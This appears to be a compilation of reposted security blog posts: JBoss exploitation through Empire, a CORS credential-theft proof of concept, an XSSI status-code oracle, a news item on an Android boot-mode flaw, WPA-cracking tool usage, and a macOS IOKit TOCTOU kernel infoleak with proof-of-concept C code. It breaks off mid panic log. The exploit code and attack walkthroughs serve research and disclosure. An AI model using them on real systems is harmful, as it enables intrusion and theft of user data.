the ability to generate java .war files for deploying agents. If you’re doing this outside of Empire, you can also generate a .war file using another @harmj0y script at https://gist.github.com/HarmJ0y/aecabdc30f4c4ef1fad3 Here I host the .war file with the python SimpleHTTPServer module. This is necessary as the jmx-console exploit will reach out to grab this file and deploy it on the target server. Finally, I load the exploitation/exploit_jboss module and set the required options. I start by setting the JMXConsole switch to “true”. Next, The AppName needs to match the AppName I used when generating the .war file. I point the WarFile to my Python hosted file. Since I am tunnelling this exploit through an already deployed agent, I need to set the Agent option to deploy the exploit from. Empire will also let you know if this module is “opsec safe”, meaning it drops a file to disk. Once the exploit is launched, I first see the HTTP request from the target server to grab the hosted .war file. After a few seconds, I am greeted by a new Empire agent! If you’re looking for a way to enumerate and exploit internal web services without the noise of port-scanning, give this a try. The standalone Find-Fruit and Exploit-JBoss PowerShell scripts may be found on my github repository as well. Scripts: https://github.com/rvrsh3ll/Misc-Powershell-Scripts Empire http://www.powershellempire.com/ Sursa: http://www.rvrsh3ll.net/blog/offensive/exploiting-jboss-with-powershell-and-empire/

Exploiting Misconfigured CORS (Cross Origin Resource Sharing) DECEMBER 16, 2016 ADMIN Hey frnds few days before noticed a blog post for exploiting facebook chat and reading all the chats of users so that made me to interested to know about the issues, and basically it was misconfigured CORS configuration where null origin is allowed with credentials true, it was not something heard for the 1st time, @albinowax from the portswigger explained it very well in his blog post, so after reading that messenger blog post i went to test for the same issue for some targets where i allowed to test it. but before that here are some tips about CORS where it can be exploitable from attackers point of view: POORLY IMPLEMENTED, BEST CASE FOR ATTACK: Access-Control-Allow-Origin: https://attacker.com Access-Control-Allow-Credentials: true POORLY IMPLEMENTED, EXPLOITABLE: Access-Control-Allow-Origin: null Access-Control-Allow-Credentials: true BAD IMPLEMENTATION BUT NOT EXPLOITABLE: Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true or just Access-Control-Allow-Origin: * even this is not good from development point of view but due to own rules of CORS if Access-Control-Allow-Origin set to * we don’t get benefit Access-Control-Allow-Credentials: true means no cookie access of the victim. am not going to more deep about CORS, as earlier blog post covered it very well. so in above i mentioned 3 cases where first two cases is exploitable in that eg of 2nd case is that Facebook Messenger chat issue which i mentioned in earlier section of the post, and eg of 1st case is mine which i found 2 days before only where any arbitrary Origin is allowed and same Origin get reflected back to Access-Control-Allow-Origin with Credentials set to True, the best way i found to check for CORS issue is using CURL. eg : curl https://test.victim.com -H "Origin: https://geekboy.ninja"-I and check the response if Origin is reflected in the response or not. OR if your burp pro user, Burp Active Scan may find this for you, but in mine case it didnt, idk the reason, when i CURLed my target manully curl https://my.target.com -H "Origin: https://geekboy.ninja" -I , the Origin didnt got reflected but when i curled specifc endpoint where all users data getting back into response curl https://my.target.com/api/web/user -H "Origin: https://geekboy.ninja" -I it reflected back with my host with Credentials set to True and that’s enough to make this work and steal all that data. i made quick poc code for it function cors() { var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { document.getElementById("demo").innerHTML = alert(this.responseText); } }; xhttp.open("GET", "https://my.target.com/api/web/user", true); xhttp.withCredentials = true; xhttp.send(); } And here how it worked Sources for better understanding of CORS: http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS https://ejj.io/misconfigured-cors/ Sursa: http://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/

A New XSSI Vector (or the untold merits of nosniff)... Posted on December 19, 2016 by Dennis Goodlett Introduction While playing with Cross Site Script Inclusion (XSSI) recently, I realized the attack can be used to leak information, cross-origin, from HTTP status codes. If you're thinking "XSSI Login Oracle" then you're on the right track, but the attack can be expanded to more situations. Login oracles are usually JavaScript files that load or don't load depending on current authentication status. However, this attack can be done on HTML, JSON, XML, or just about any content type. This dramatically opens up the attack surface of XSSI to enumerate information from GET parameters, one bit at a time. I haven't seen this specific attack published anywhere, so I'm going to attempt to make this post as comprehensive as possible. Edit:domnul_anonim on Reddit pointed out that Mike Cardwell published the same basic attack before it was called "XSSI". My blog post presents some new ideas about the attack, but referring to it as “new” is a bit bold and isn't quite appropriate. I've also structured this paper for easy reference. The structure is as follows: Attack Attack Requirements Defense Further study Summary TLDR Attack: Read "A More Interesting Example" in the Attack section below for a walkthrough. TLDR Defense: Use the nosniff HTTP header ("Requirement 1" explained in Defense section below). I won't explain the basics of XSSI because I lack the room. SCIP has a blog post explaining XSSI in great depth. I consider it the best reference and introduction on the subject. I'm presenting an attack on non-script content injection. Stronger attacks on non-script content are explained in the cited blog but the attacks tend to require more specialized circumstances (encoding and injection tricks) than the one I will be demonstrating. 1.) The Attack The basic idea is very similar to a XSSI login oracle. An attacker attempts to load script tags to his page that point at a different origin. By handling the onerror, onload, and window.onerror functions, an attacker can learn information about how the cross-origin server responded to the GET request. I was surprised to learn that onerror executes if you receive a non-2XX response, and onload executes otherwise. This is regardless of the content type returned, unless strict content type is being enforced (see Requirement 1). So what's the big deal? What can you learn from a 200 vs a 400 response? Well, it depends on the endpoint but potentially a lot. After all, the HTTP status code is meant to return information, and often does for API's. SOME BASIC EXAMPLES Imagine an /admin directory that returns a 200 status code and HTML if you're authenticated, and a 401 with an HTML error page if you aren't. This would act not only as a login oracle, but it would also allow the enumeration of privileges. If there was a unique profile page for each user (ie: /profile/dennis) then a similar attack could be used by a malicious site to identify specific users for further attacks and play innocent to response teams. If a page has SQL injection in a GET request but cannot be reached by the attacker, the attacker can cause authenticated users visiting an attacker controlled page to bit bang the injection for the attacker and leak the results cross origin to the attacker's JavaScript. A MORE INTERESTING EXAMPLE Let’s walk through a more interesting example in greater detail. Imagine a ticketing system that has a search field which is used to look up customer information. Sending a GET to "/search?c=d*", where the “*” character is acting as a wildcard, will return all the customers that start with the letter "d" and a 200 status code. If no customers match the “d*” pattern, then a 500 is returned. An attacker wants this information, but can’t login and just look. So instead he asks an already logged in user to make requests in the attacker’s behalf and tell the onload function “yes, I found someone” or tell the onerror function “no, that search returned nothing”. It’s similar to exploiting a blind SQL injection except it’s through a third party and you're abusing Same-Origin Policy instead of syntax. Notice, the content type returned in the body by the ticketing system does not need to be assumed here. The search can return JSON, XML, HTML or even an image, it's all the same to this attack as long as the nosniff header isn't being returned (Requirement 1 in defense). URL parameters can be included in the script src attribute so an attacker can create a script like so: d = document.createElement('script'); d.src = victim_domain + "/search?c=a*"; This will send a GET request to the “/search?c=a*” API on the ticketing system. Now the attacker just sets the onload and onerror events to log success and failure respectively: d.onload = function(){client_exists("a*")}; d.onerror = function(){client_does_not_exist("a*")}; Then append it to the DOM: document.head.appendChild(d); Any visitor to the attacker's site will then automatically send a GET request to the ticketing system, cross-origin. If there's a customer that starts with "a", then the endpoint will return a 200 and the onload will execute. The attacker's onload handler would then load another script into the DOM asking if there are any customers that start with "aa". If the onerror event occurs it's because there were not customers that started with the letter "a", so the attacker would then load another script into the DOM checking for customers who start with the letter "b". The script would continue with a tree searching algorithm until a valid customer name was returned. Once a customer name is discovered, the same type of attack can be used to search other API endpoints that require a customer name and return other information. For example, an endpoint that searches for email addresses associated to a customer. The attacker could also search for customers matching the "*" pattern. If this fails it means the visitor doesn't have access to the ticketing system customer search and no further requests need to be made. Because the information stealing requests are being performed by visitors to the attacker's site, the attack can be parallelized across all visitors. Put all this together with a social engineering email and there is potential for a lot of information leakage from even an internal ticketing systems. This attack is not far fetched and does not require a special circumstances. HTTP status codes are meant to return information. Script tags are meant to detect the onerror and onload. 2.) Attack Requirements To put it simply, the following elements are required: The 'X-Content-Type-Options: nosniff' HTTP header is not being returned, unless the content type is JavaScript. The endpoint must respond to a GET request. The status code of the endpoint varies from a 200 type response to a non-200 type response for success/failure (Note: 300 responses seem to act like whatever status code they point to). The information is not publicly available. The most concerning thing is what is not said here. There is no mention of content type, other than JavaScript in requirement 1. So, this attack works on XML, JSON, images, or any other content (so far as I have seen). (See Note 2 in "Requirement 1" below for details). More details on the requirements follow in the defense section. Pentesters: you should read that section too, because it explains some more tricks in greater depth. 3.) The Defense You just have to disturb one of the above requirements. Let's go through the requirements in greater detail from a defensive perspective. REQUIREMENT 1 If the ‘X-Content-Type-Options: nosniff’ HTTP header is returned, this attack won’t work. This is the simplest to verify and to implement. If you want to fix your site this is probably the way to do it. The nosniff header is a way the server can tell a browser "When I say I am giving you <Content-Type> I mean it is really <Content-Type>!". Why does this work? All types of files are served over HTTP, and web developers aren't always good about declaring the file type properly. So when a browser requests a JavaScript file, the content-type header may declare it's actually HTML. A browser thus puts off producing an error until it tries to parse the file as JavaScript. At that point, onload has already executed and any parsing errors will call the window.onerror function. The existence of the nosniff header means onerror will always be called immediately if the content type isn't stated correctly. Always onerror means no measurable difference and no information loss. If the content type is JavaScript, nosniff doesn't help and you have a normal XSSI attack. Note: This is only true for browsers that respect the nosniff header. IE and Chrome were the first to support this header. Firefox has followed also, I don’t know when support started but I have found Firefox 50 Firefox 51 honors nosniff while Firefox 45.5 does not. I assume Edge will act the same as IE, but I haven't personally tested either of them. Edit: 1lastBr3ath from Reddit pointed out Safari doesn't support the no-sniff header, Edge does. Also he corrected my mistake, it is Firefox 51 not 50 that included support for no-sniff. Note2: On the topic of what content type, 1lastBr3ath from reddit pointed me to this documentation, which is really where I should've pointed to. It states: The script should be served with the text/javascript MIME type, but browsers are lenient and only block them if the script is served with an image type (image/*), a video type (video/*), an audio (audio/*) type, or text/csv. If the script is blocked, an error is sent to the element, if not a successevent is sent. So all content types won't work in script tags. However, typical informational content types, like XML or JSON will. This restriction can potentially be bypassed by just using a different tag (See Further Study: other tags). REQUIREMENT 2 Script tags only work with GET requests. So if your endpoint only accepts POST requests, then this attack can’t be performed. This requirement is seemingly simple, but be careful. You may have designed your API to accept POST requests but your content management system may accept GET requests all the same. REQUIREMENT 3 If the endpoint always returns a 200, then there is no information within the status code to steal. However, status codes exist for a reason! Don’t just go abandoning a core part of the HTTP protocol just to stop this attack. Use the nosniff header instead. Constant HTTP status codes do stop the particular attack described here, but other attacks may still be possible. For example, a top level JSON array can be parsed as JavaScript while a top level JSON object can not. So even though your endpoint always returns 200 status codes, information can be gathered from whether or not there is a parsing error by creating a window.onerror function. Applying the nosniff header will stop even this attack as long as the Content-Type header is appropriately set to JSON. REQUIREMENT 4: If an attacker is in a position to just load up the secret information in his own browser, then there is no need for this attack. This attack revolves around an attacker domain asking a visitor to use their privileged position to get more information. Privileged position will most commonly mean authenticated, but could also mean network position. If your home router has this vulnerability, malicious public sites can request scripts from it and leak information. 4.) Further Study 3XX CODES: I have given little attention to open redirects and 3XX responses, which could expand the attack further. So far it does appear redirecting to a 2XX acts like a 2XX and redirecting to a non-2XX acts like a non-2XX. This means an endpoint protecting itself by checking the referer header might be bypassed if an open redirect is discovered. This is a neat idea too. OTHER TAGS: I believe img tags pointing cross-origin behave similar to script tags. Maybe loading a resource in both img and script tags could lead to more information disclosure due to parsing differences. CSS may also deserve a look. OTHER ATTRIBUTES I was hoping Subresource Integrity would yield further information leaks, but it wisely requires CORS to work. If you can get around CORS then there are bigger problems then this attack. I have spent most of my time testing onload, onerror, and window.onerror to get information. Observing more attributes may yield other attacks or more information per request. 5.) In Summary Any detectable difference in loading a cross origin resource is information. That information may be as minor as a login oracle, but could potentially be as bad as credentials (though unlikely). Defenders: A misunderstanding of content type is a common vector for all sorts of attacks. Enforcing strict content type with the nosniff HTTP header will mitigate this and many more attacks. It also puts you in a failsafe position. A response with improper content will cause an error that will be obvious to anyone and fixed easily. Attackers: Same origin policy is a little understood concept, which makes it a great source of bugs. Look for sensitive information returned in GET requests. Then see if you can detect any difference in behavior when requesting that information cross origin via script tags. This entry was posted in Penetration Testing by Dennis Goodlett Sursa: https://www.hurricanelabs.com/blog/new-xssi-vector-untold-merits-of-nosniff

Mobile Security Framework (MobSF) Version: v0.9.3 beta Mobile Security Framework (MobSF) is an intelligent, all-in-one open source mobile application (Android/iOS/Windows) automated pen-testing framework capable of performing static and dynamic analysis. It can be used for effective and fast security analysis of Android, iOS and Windows mobile Applications and supports both binaries (APK, IPA & APPX ) and zipped source code. MobSF can also perform Web API Security testing with it's API Fuzzer that can do Information Gathering, analyze Security Headers, identify Mobile API specific vulnerabilities like XXE, SSRF, Path Traversal, IDOR, and other logical issues related to Session and API Rate Limiting. Made with in India MobSF is also bundled with Android Tamer and BlackArch Documentation https://github.com/ajinabraham/Mobile-Security-Framework-MobSF/wiki/1.-Documentation Collaborators Ajin Abraham Dominik Schlecht Presentations OWASP APPSEC EU 2016 - Slides | Video NULLCON 2016 - Slides c0c0n 2015 - Slides More info: https://github.com/ajinabraham/Mobile-Security-Framework-MobSF

Google patches severe Android boot mode vulnerability The critical vulnerability left Android devices open to denial of service and privilege escalation attacks. By Charlie Osborne for Zero Day | January 9, 2017 -- Symantec Google has resolved a dangerous Android vulnerability which allowed attackers to reboot Nexus devices into custom boot modes, leading to spying and remote attacks. Patched as part of Google's January Android security bulletin, the flaw, CVE-2016-8467, grants cyberattackers the ability to use PC malware or malicious chargers to reboot a Nexus 6 or 6P device and implement a special boot configuration, or boot mode, which instructs Android to turn on various extra USB interfaces. According to IBM X-Force Application Security Research Team researchers Roee Hay and Michael Goberman, who revealed further details of the vulnerability in a blog post, the flaw gives attackers access to interfaces which offer additional control over a compromised device. In particular, the Nexus 6 the modem diagnostics interface is of concern as accessing this platform gives attackers access to the modem, which compromises "confidentiality and integrity," the team says. Once an attacker has gained access to the modem they can intercept phone calls, for example. It would also be possible to sniff mobile data packets and grab information including GPS coordinates of the device for tracking, place phone calls, steal call information and either access or change nonvolatile (NV) items or the EFS partition of a device. See also: Google patches Dirty Cow vulnerability in latest Android security update IBM says that if Android Debug Bridge (ADB) is enabled on the device, PC malware or a malicious charger can boot the target device with the special boot mode configuration. Once connected, the user is forced to accept the PC or charger permanently, a few commands are issued, and the device is rebooted. "Every future boot from this point forward will have the boot mode configuration enabled," IBM says. This means the attack is persistent and no longer requires ADB to run, although it still requires USB access." "Therefore, the attacker only needs the victim to enable ADB once," the researchers added. "Moreover, a lucky attacker might wait for the device to be in fastboot mode, which requires no authorization from the victim. This, however, is less likely." If attackers have physical access to the device, they can also reboot it into the custom boot mode manually. These issues are less severe on the Nexus 6P due to firmware protections, however, a quirk in the device type means attackers can open ADB sessions even if the mode has been disabled. In addition, due to the inclusion of additional USB interfaces in both device types, attackers can also access other interfaces to send or on SMS messages and potentially bypass two-factor authentication, escalate privileges, change radio settings and access a wide range of mobile device features. Google has now patched the flaw by forbidding a locked bootloader to boot with the dangerous boot modes. In December, researchers revealed that a new variant of Android malware called Gooligan was exploiting unpatched vulnerabilities to steal sensitive user data. Sursa: http://www.zdnet.com/article/google-patches-severe-android-boot-mode-vulnerability/

DriveCrypt DriveCrypt Dcr.sys vulnerability exploit for bypassing x64 DSE Link: https://github.com/subTee/DriveCrypt

HandShaker Detect, deauth, capture, crack WPA/2 handshakes and WEP keys. Crack WPS Pins Record AP location with Android GPS. Maintain a db of pwnd APs to avoid repetition. Installation: Run 'make install' in the HandShaker directory. handshaker will now be installed and can be run with 'handshaker'. Usage HandShaker - Detect, deauth, capture, crack WPA/2 handshakes and WEP Keys automagically. by d4rkcat <thed4rkcat@yandex.com> Usage: handshaker <Method> <Options> Method: -a - Autobot or wardriving mode -e - Search for AP by partial unique ESSID -l - Scan for APs and present a target list -c - Crack handshake from pcap -r - WPS Cracking with reaver Options: -i - Wireless Interface card -i2 - Second wireless card (better capture rate) -w - Wordlist to use for cracking -o - Save handshakes to custom directory -d - Deauth packets sent to each client (default 1) -p - Only attack clients above this power level -g - Use android GPS to record AP location -B - Use besside-ng to capture handshakes -E - Use evil twin AP to capture handshakes -M - Use mdk3 for deauth (default aireplay-ng) -T - Attempts to capture per AP (default 3) -W - Only attack WEP encrypted APs -s - Silent -h - This help Examples: handshaker -a -i wlan0 -T 5 ~ Autobot mode on wlan0 and attempt 5 times. handshaker -e Hub3-F -w wordlist.txt ~ Find AP like 'Hub3-F' and crack with wordlist. handshaker -l -o out/dir ~ List all APs and save handshakes to out/dir. handshaker -c handshake.cap -w wordlist.txt ~ Crack handshake.cap with wordlist. all your AP are belong to us.. Sursa: https://github.com/d4rkcat/HandShaker

Racing for everyone: descriptor describes TOCTOU in Apple's core by Qidan He (@flanker_hqd) This blog post is about a new type of vulnerabilities in IOKit I discovered and submitted to Apple in 2016. I did a brief scan using a IDA script on MacOS and found at least four bugs with 3 CVEs assigned (CVE-2016-7620/4/5), see https://support.apple.com/kb/HT207423. I was told afterwards that there’re even more issues of this type on iOS’/OSX’s IOKit drivers and fortunately Apple fixed them also. Lecture time: IOKit revisited Recall the old userspace iokit call entry method: 1709 kern_return_t 1710 IOConnectCallMethod( 1711 mach_port_t connection, // In 1712 uint32_t selector, // In 1713 const uint64_t *input, // In 1714 uint32_t inputCnt, // In 1715 const void *inputStruct, // In 1716 size_t inputStructCnt, // In 1717 uint64_t *output, // Out 1718 uint32_t *outputCnt, // In/Out 1719 void *outputStruct, // Out 1720 size_t *outputStructCntP) // In/Out 1721 { //... 1736 if (inputStructCnt <= sizeof(io_struct_inband_t)) { 1737 inb_input = (void *) inputStruct; 1738 inb_input_size = (mach_msg_type_number_t) inputStructCnt; 1739 } 1740 else { 1741 ool_input = reinterpret_cast_mach_vm_address_t(inputStruct); 1742 ool_input_size = inputStructCnt; 1743 } 1744 //... 1770 else if (size <= sizeof(io_struct_inband_t)) { 1771 inb_output = outputStruct; 1772 inb_output_size = (mach_msg_type_number_t) size; 1773 } 1774 else { 1775 ool_output = reinterpret_cast_mach_vm_address_t(outputStruct); 1776 ool_output_size = (mach_vm_size_t) size; 1777 } 1778 } 1779 1780 rtn = io_connect_method(connection, selector, 1781 (uint64_t *) input, inputCnt, 1782 inb_input, inb_input_size, 1783 ool_input, ool_input_size, 1784 inb_output, &inb_output_size, 1785 output, outputCnt, 1786 ool_output, &ool_output_size); 1787 //... 1795 return rtn; 1796 } If the inputstruct is larger than sizeof(io_struct_inband_t), the passed in argument will be casted to a mach_vm_address_t, otherwise just a native pointer. Is this one race-able? No? Is that one race-able? For a curious mind one would like to ask, if there exists any possibility that this can be modified to lead to TOCOU? Historical vulnerabilities focuses on racing memories shared via IOConnectMapMemory, whose meaning is very obvious according to this name (see Pangu’s and Ian Beer‘s ) research), however these kinds of vulns are mostly eliminated now. Eyes turned to these simple and naive IOKit arguments, are these benign little spirits even race-able? Lets see how these arguments are passed from userspace to kernel space. In MIG trap defs and generated code, different input types are dealt in different ways. 601 602routine io_connect_method( 603 connection : io_connect_t; 604 in selector : uint32_t; 605 606 in scalar_input : io_scalar_inband64_t; 607 in inband_input : io_struct_inband_t; 608 in ool_input : mach_vm_address_t; 609 in ool_input_size : mach_vm_size_t; 610 611 out inband_output : io_struct_inband_t, CountInOut; 612 out scalar_output : io_scalar_inband64_t, CountInOut; 613 in ool_output : mach_vm_address_t; 614 inout ool_output_size : mach_vm_size_t 615 ); 616 The following code is generated: /* Routine io_connect_method */ mig_external kern_return_t io_connect_method ( mach_port_t connection, uint32_t selector, io_scalar_inband64_t scalar_input, mach_msg_type_number_t scalar_inputCnt, io_struct_inband_t inband_input, mach_msg_type_number_t inband_inputCnt, mach_vm_address_t ool_input, mach_vm_size_t ool_input_size, io_struct_inband_t inband_output, mach_msg_type_number_t *inband_outputCnt, io_scalar_inband64_t scalar_output, mach_msg_type_number_t *scalar_outputCnt, mach_vm_address_t ool_output, mach_vm_size_t *ool_output_size ) { //... (void)memcpy((char *) InP->scalar_input, (const char *) scalar_input, 8 * scalar_inputCnt); //... if (inband_inputCnt > 4096) { { return MIG_ARRAY_TOO_LARGE; } } (void)memcpy((char *) InP->inband_input, (const char *) inband_input, inband_inputCnt); //... InP->ool_input = ool_input; InP->ool_input_size = ool_input_size; OK, seems scala-input and struct-input with size < 4096 are copied and bundled inband of the mach-msg, then passed into kernel space. No way. However, Struct-input with size > 4096 remains mach_vm_address and is untouched. Now lets dive into kernel space 3701 kern_return_t is_io_connect_method 3702 ( 3703 io_connect_t connection, 3704 uint32_t selector, 3705 io_scalar_inband64_t scalar_input, 3706 mach_msg_type_number_t scalar_inputCnt, 3707 io_struct_inband_t inband_input, 3708 mach_msg_type_number_t inband_inputCnt, 3709 mach_vm_address_t ool_input, 3710 mach_vm_size_t ool_input_size, 3711 io_struct_inband_t inband_output, 3712 mach_msg_type_number_t *inband_outputCnt, 3713 io_scalar_inband64_t scalar_output, 3714 mach_msg_type_number_t *scalar_outputCnt, 3715 mach_vm_address_t ool_output, 3716 mach_vm_size_t *ool_output_size 3717 ) 3718 { 3719 CHECK( IOUserClient, connection, client ); 3720 3721 IOExternalMethodArguments args; 3722 IOReturn ret; 3723 IOMemoryDescriptor * inputMD = 0; 3724 IOMemoryDescriptor * outputMD = 0; 3725 //... 3736 args.scalarInput = scalar_input; 3737 args.scalarInputCount = scalar_inputCnt; 3738 args.structureInput = inband_input; 3739 args.structureInputSize = inband_inputCnt; 3740 3741 if (ool_input) 3742 inputMD = IOMemoryDescriptor::withAddressRange(ool_input, ool_input_size, 3743 kIODirectionOut, current_task()); 3744 3745 args.structureInputDescriptor = inputMD; //... 3753 if (ool_output && ool_output_size) 3754 { 3755 outputMD = IOMemoryDescriptor::withAddressRange(ool_output, *ool_output_size, 3756 kIODirectionIn, current_task()); //... 3774 return (ret); 3775 } Seems Apple and Linus take a different approach here. In Linux kernel, usually incoming userspace content are copied to kernel-allocated memory content using copy_from_user. However here the Apple kernel directly creates a memory descriptor using the userspace address, rather than creating a copy. So can we modify this memory content in userspace after it’s passed to kernel via IOKit call? Surprisingly, the answer is yes! This means, for a IOKit call, if the corresponding IOService accepts input memory descriptor, the userspace program can alter the content while the IOService is processing it, no lock, no write prevention. Juicy place for racing conditions and TOCTOUs(Time to check before time to use) After this bug is fixed I talked to security folks at Apple and they said even they didn’t realized the descriptor mapped memory is writable by userspace. I quickly identified several potential vulnerable patterns in IOReportUserClient, IOCommandQueue and IOSurface, one of them (CVE-2016-7624) is described below. And there’re far more patterns than that, using your imagination TOCTOU in IOCommandQueue can lead to information disclosure reachable from sandbox There exists an TOCTOU in IOCommandQueue::submit_command_buffer. This function accepts either inband struct or structureInputDescriptor. Data controlled by attacker is passed into the function and at certain offset a value is used as length. The length is validated but due to the nature of MemoryDescriptor, client can still change the value when its actually used by modifying the mapped memory, causing TOCTOU that lead to information disclosure or other possible oob write. Analysis IOAccelCommandQueue::s_submit_command_buffers accept user input IOExternalMethodArguments, and if structureInputDescriptor is passed in from a userspace mapped address, it will use structureInputDescriptor and get a IOMemoryMap then get its address and use it. But nothing prevents userspace from modifying the content represented by the address, lead to TOCTOU. __int64 __fastcall IOAccelCommandQueue::s_submit_command_buffers(IOAccelCommandQueue *this, __int64 a2, IOExternalMethodArguments *a3) { IOExternalMethodArguments *v3; // r12@1 IOAccelCommandQueue *v4; // r15@1 unsigned __int64 inputdatalen; // rsi@1 unsigned int v6; // ebx@1 IOMemoryDescriptor *v7; // rdi@3 __int64 v8; // r14@3 __int64 inputdata; // rcx@5 v3 = a3; v4 = this; inputdatalen = (unsigned int)a3->structureInputSize; v6 = -536870206; if ( inputdatalen >= 8 && inputdatalen - 8 == 3 * (((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL) ) { v7 = (IOMemoryDescriptor *)a3->structureInputDescriptor; v8 = 0LL; if ( v7 ) { v8 = (__int64)v7->vtbl->__ZN18IOMemoryDescriptor3mapEj(v7, 4096LL); v6 = -536870200; if ( !v8 ) return v6; inputdata = (*(__int64 (__fastcall **)(__int64))(*(_QWORD *)v8 + 280LL))(v8); LODWORD(inputdatalen) = v3->structureInputSize; } We can see that at offset+4, a DWORD is retrived as length and compared with ((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL) And then this length offset is used again in submit_command_buffer. See the following code: if ( *((_QWORD *)this + 160) ) { v5 = (IOAccelShared2 *)*((_QWORD *)this + 165); if ( v5 ) { IOAccelShared2::processResourceDirtyCommands(v5); IOAccelCommandQueue::updatePriority((IOAccelCommandQueue *)v2); if ( *(_DWORD *)(input + 4) ) { v6 = (unsigned __int64 *)(input + 24); v7 = 0LL; do { IOAccelCommandQueue::submitCommandBuffer( (IOAccelCommandQueue *)v2, *((_DWORD *)v6 - 4),//v6 based on input *((_DWORD *)v6 - 3),//based on input *(v6 - 1),//based on input *v6);//based on input ++v7; v6 += 3; } while ( v7 < *(unsigned int *)(input + 4) ); //NOTICE HERE } Notice in line 23 that *(input+4) is accessed again as loop boundary. However if user passes in a descriptor, then he can modify it at userland and bypass the check in s_submit_command_buffers, cause the loop to go out-of-bound. In IOAccelCommandQueue::submitCommandBuffer, in the following statement: IOGraphicsAccelerator2::sendBlockFenceNotification( *((IOGraphicsAccelerator2 **)this + 166), (unsigned __int64 *)(*((_QWORD *)this + 160) + 16LL), data_from_input_add_24_minus_8, 0LL, v13); result = IOGraphicsAccelerator2::sendBlockFenceNotification( *((IOGraphicsAccelerator2 **)this + 166), (unsigned __int64 *)(*((_QWORD *)this + 160) + 16LL), data_from_input_add_24, 0LL, v13); The memory content is sent back to user space if a notification callback is installed. So if an attacker can carefully control some sensitive memory to place after the mapped descriptor memory, the OOB can get this content back to userspace, lead to infoleak. The exploit steps are Userspace program mmaps memory page, pass it as iokit call argument structureInputDescriptor s_submit_command_buffer validates at +4 the content is legal compared to the total incoming structureInput length submit_command_buffer iterates the passed in descriptor memory from userspace, using the +4 as boundary length indicator. Memory content readed is calculated in submitCommandBuffer and send back to userspace via installed asyncNotificationPort. Userspace program races to modify this +4 offset value, causing the loop to go out-of-bound, leaking adjacent memory in Kernel address space. Notice that the inputdatelen is first retrieved from structureInputSize, so we cannot directly use the IOConnectCallMethod API. Because in this API, structureInput and structureInputDescriptor cannot be passed at same time. Instead we directly call _io_connect_method private function in IOKit framework, which accepts structureInput and structureInputDescriptor at same time. POC code POC code for these three vulns can all be found at https://github.com/flankerhqd/descriptor-describes-racing. Here is one simplified version: volatile unsigned int secs = 10; void modifystrcut() { *((unsigned int*)(input+4)) = 0x7fffffff; printf("secs %x\n", secs); } //... int main(int argc, const char * argv[]) { io_iterator_t iterator; //... getFunc(); io_connect_t conn; io_service_t svc; //... IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IntelAccelerator"), &iterator); svc = IOIteratorNext(iterator); printf("%x %x\n", IOServiceOpen(svc, mach_task_self(), 9, &conn), conn); //... io_connect_t sharedconn; IOServiceOpen(svc, mach_task_self(), 6, &sharedconn); IOConnectAddClient(conn, sharedconn); //then set async ref ref = IONotificationPortCreate(kIOMasterPortDefault); port = IONotificationPortGetMachPort(ref); pthread_t rt; pthread_create(&rt, NULL, gaorunloop, NULL); io_async_ref64_t asyncRef; asyncRef[kIOAsyncCalloutFuncIndex] = callback; asyncRef[kIOAsyncCalloutRefconIndex] = NULL; //... const uint32_t outputcnt = 0; const size_t outputcnt64 = 0; IOConnectCallAsyncScalarMethod(conn, 0, port, asyncRef, 3, NULL, 0, NULL, &outputcnt); //... size_t i=0; input = dommap(); { char* structinput = input; *((unsigned int*)(structinput+4)) = 0xaa;//the size is then used in for loop, possible to change it in descriptor? size_t outcnt = 0; } //... const size_t bufsize = 4088; char buf[bufsize]; memset(buf, 'a', sizeof(buf)*bufsize); size_t outcnt =0; *((unsigned int*)(buf+4)) = 0xaa; //... { pthread_t t; pthread_create(&t, NULL, modifystrcut, NULL); //... io_connect_method( conn, 1, NULL,//input 0,//inputCnt buf,//inb_input bufsize,//inb_input_size reinterpret_cast_mach_vm_address_t(input),//ool_input ool_size,//ool_input_size buf,//inb_output (mach_msg_type_number_t*)&outputcnt, //inb_output_size* (uint64_t*)buf,//output &outputcnt, //outputCnt reinterpret_cast_mach_vm_address_t(buf), //ool_output (mach_msg_type_number_t*)&outputcnt64//ool_output_size* ); } Two key constans are 4088 and 0xaa, this two numbers will comfort the check at inputdatalen - 8 == 3 * (((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL) ) and if ( *(_DWORD *)(inputdata + 4) == (unsigned int)((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)((unsigned __int64)(unsigned int)inputdatalen - 8) >> 64) >> 4) ) Panic Report panic(cpu 0 caller 0xffffff801dfce5fa): Kernel trap at 0xffffff7fa039d2a4, type 14=page fault, registers: CR0: 0x0000000080010033, CR2: 0xffffff812735f000, CR3: 0x000000000ce100ab, CR4: 0x00000000001627e0 RAX: 0x000000007fffffff, RBX: 0xffffff812735f008, RCX: 0x0000000000000000, RDX: 0x0000000000000000 RSP: 0xffffff81276d3b60, RBP: 0xffffff81276d3b80, RSI: 0x0000000000000000, RDI: 0xffffff802fcaef80 R8: 0x00000000ffffffff, R9: 0x0000000000000002, R10: 0x0000000000000007, R11: 0x0000000000007fff R12: 0xffffff8031862800, R13: 0xaaaaaaaaaaaaaaab, R14: 0xffffff812735e000, R15: 0x00000000000000aa RFL: 0x0000000000010293, RIP: 0xffffff7fa039d2a4, CS: 0x0000000000000008, SS: 0x0000000000000010 Fault CR2: 0xffffff812735f000, Error code: 0x0000000000000000, Fault CPU: 0x0, PL: 0 Backtrace (CPU 0), Frame : Return Address 0xffffff81276d37f0 : 0xffffff801dedab12 mach_kernel : _panic + 0xe2 0xffffff81276d3870 : 0xffffff801dfce5fa mach_kernel : _kernel_trap + 0x91a 0xffffff81276d3a50 : 0xffffff801dfec463 mach_kernel : _return_from_trap + 0xe3 0xffffff81276d3a70 : 